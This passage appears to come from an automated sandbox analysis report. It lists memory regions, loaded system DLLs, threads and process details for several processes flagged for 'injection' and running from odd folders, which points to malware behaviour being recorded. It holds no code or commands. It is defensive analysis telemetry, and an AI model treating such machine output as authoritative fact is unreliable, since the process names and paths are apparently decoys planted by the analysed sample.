0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4176 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4177 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4178 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4179 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4180 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4181 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4182 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4183 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4184 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4185 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4186 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 235 os_tid = 0x1250 Thread: id = 236 os_tid = 0x11e0 Process: id = "57" image_name = "smartftp.exe" filename = "c:\\program files\\common files\\smartftp.exe" page_root = "0x1f4e2000" os_pid = "0x11cc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files\\Common Files\\smartftp.exe\" " cur_dir = "C:\\Program Files\\Common Files\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4043 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4044 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4045 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4046 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4047 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4048 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4049 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4050 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4051 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4052 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4053 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4054 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4055 start_va = 0x430000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 4056 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4057 start_va = 0x5e0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 4058 start_va = 0x610000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 4059 start_va = 0x810000 end_va = 0x997fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 4060 start_va = 0x9a0000 end_va = 0xb20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 4061 start_va = 0xb30000 end_va = 0xbebfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b30000" filename = "" Region: id = 4062 start_va = 0xc10000 end_va = 0xc1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 4063 start_va = 0x11c0000 end_va = 0x11d6fff monitored = 0 entry_point = 0x11c14a1 region_type = mapped_file name = "smartftp.exe" filename = "\\Program Files\\Common Files\\smartftp.exe" (normalized: "c:\\program files\\common files\\smartftp.exe") Region: id = 4064 start_va = 0x11e0000 end_va = 0x25dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Region: id = 4065 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4066 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4067 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4068 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 4069 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4070 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 4071 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4072 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4073 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4074 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4075 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4076 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4077 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4078 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4079 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4080 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4081 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4082 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4083 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4084 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4085 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4086 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4087 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4088 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4089 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4090 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 237 os_tid = 0x124c Thread: id = 238 os_tid = 0x11d0 Process: id = "58" image_name = "webdrive.exe" filename = "c:\\program files (x86)\\windowspowershell\\webdrive.exe" page_root = "0x1ebb1000" os_pid = "0x11b4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\WindowsPowerShell\\webdrive.exe\" " cur_dir = "C:\\Program Files (x86)\\WindowsPowerShell\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4619 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4620 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4621 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4622 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4623 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4624 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4625 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4626 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4627 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4628 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4629 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4630 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4631 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4632 start_va = 0x4b0000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 4633 start_va = 0x4c0000 end_va = 0x57dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4634 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 4635 start_va = 0x7c0000 end_va = 0x947fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 4636 start_va = 0x950000 end_va = 0xad0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000950000" filename = "" Region: id = 4637 start_va = 0xae0000 end_va = 0xb9bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ae0000" filename = "" Region: id = 4638 start_va = 0xc10000 end_va = 0xc1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 4639 start_va = 0x13b0000 end_va = 0x13c6fff monitored = 0 entry_point = 0x13b14a1 region_type = mapped_file name = "webdrive.exe" filename = "\\Program Files (x86)\\WindowsPowerShell\\webdrive.exe" (normalized: "c:\\program files (x86)\\windowspowershell\\webdrive.exe") Region: id = 4640 start_va = 0x13d0000 end_va = 0x27cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013d0000" filename = "" Region: id = 4641 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4642 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4643 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4644 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 4645 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4646 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 4647 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4648 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4649 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4650 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4651 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4652 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4653 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4654 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4655 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4656 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4657 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4658 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4659 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4660 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4661 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4662 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4663 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4664 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4665 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4666 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 239 os_tid = 0x1298 Thread: id = 240 os_tid = 0x11b8 Process: id = "59" image_name = "ccv_server.exe" filename = "c:\\program files\\reference assemblies\\ccv_server.exe" page_root = "0xae8b000" os_pid = "0x1230" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files\\Reference Assemblies\\ccv_server.exe\" " cur_dir = "C:\\Program Files\\Reference Assemblies\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 241 os_tid = 0x12d4 Thread: id = 242 os_tid = 0x1234 Process: id = "60" image_name = "creditservice.exe" filename = "c:\\program files (x86)\\windows sidebar\\creditservice.exe" page_root = "0x163b9000" os_pid = "0x12c0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\Windows Sidebar\\creditservice.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Sidebar\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 243 os_tid = 0x12dc Thread: id = 244 os_tid = 0x12c4 Process: id = "61" image_name = "flashfxp.exe" filename = "c:\\program files (x86)\\reference assemblies\\flashfxp.exe" page_root = "0x21120000" os_pid = "0x1134" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\Reference Assemblies\\flashfxp.exe\" " cur_dir = "C:\\Program Files (x86)\\Reference Assemblies\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4331 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4332 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4333 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4334 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4335 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4336 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4337 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4338 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4339 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4340 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4341 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4342 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4343 start_va = 0x430000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 4344 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4345 start_va = 0x5a0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename 